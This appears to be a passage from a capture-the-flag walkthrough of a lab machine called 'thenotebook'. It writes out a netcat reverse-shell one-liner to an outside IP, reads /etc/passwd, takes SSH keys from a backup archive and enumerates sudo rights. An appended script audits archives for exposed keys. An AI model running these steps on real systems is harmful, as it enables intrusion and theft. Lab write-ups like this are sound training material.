4 shell
There is some AV / firewall that is deleting the PHP shell every time.
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
noah:x:1000:1000:Noah:/home/noah:/bin/bash
As the shell keeps dying and the .php file is being deleted, I set up a stable bash connection using:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.2 443 >/tmp/f
Enumerating, I find home.tar.gz in /var/backups:
cp home.tar.gz /tmp
tar -xf home.tar.gz
=> We find .ssh keys
$ chmod 600 id_rsa
$ ssh -i id_rsa noah@10.10.10.230
noah@thenotebook:~$ whoami;id
noah
uid=1000(noah) gid=1000(noah) groups=1000(noah)
noah@thenotebook:~$ sudo -l
Matching Defaults entries for noah on thenotebook:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User noah may run the following commands on thenotebook:
(ALL) NOPASSWD: /usr/bin/docker exec -it webapp-dev01*
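From the defender's side, the home.tar.gz finding above can be caught with a periodic audit of backup archives. The script below is an added example, not part of the original writeup: it lists archive members that carry a private key header and reports whether the archive is world-readable. The function names are hypothetical, and it assumes a tar that auto-detects compression plus GNU or BSD stat.

```shell
#!/bin/sh
# Added example (not from the original writeup): audit backup archives for
# embedded private keys. Function names are hypothetical.

# Print the archive's permission bits in octal (GNU stat, BSD stat as fallback).
archive_mode() {
    stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"
}

# Succeeds if "other" users have read permission on the archive.
world_readable() {
    mode=$(archive_mode "$1") || return 1
    case "${mode#"${mode%?}"}" in          # last octal digit = "other" bits
        4|5|6|7) return 0 ;;
        *) return 1 ;;
    esac
}

# Print every archive member whose content has a PEM/OpenSSH private key header.
list_private_keys() {
    tar -tf "$1" | while IFS= read -r member; do
        case "$member" in */) continue ;; esac   # skip directory entries
        if tar -xOf "$1" "$member" 2>/dev/null |
            grep -q -e '-----BEGIN [A-Z ]*PRIVATE KEY-----'; then
            printf '%s\n' "$member"
        fi
    done
}

# One line per finding: archive path, mode, world-readable flag, member name.
audit_backup_archive() {
    if world_readable "$1"; then wr=yes; else wr=no; fi
    list_private_keys "$1" | while IFS= read -r key; do
        printf '%s mode=%s world-readable=%s key=%s\n' "$1" "$(archive_mode "$1")" "$wr" "$key"
    done
}

# Usage: sh audit.sh /var/backups/*.tar.gz
for archive in "$@"; do
    audit_backup_archive "$archive"
done
```

Any line it prints means a private key is sitting inside a backup; a `world-readable=yes` line means any local account can extract it.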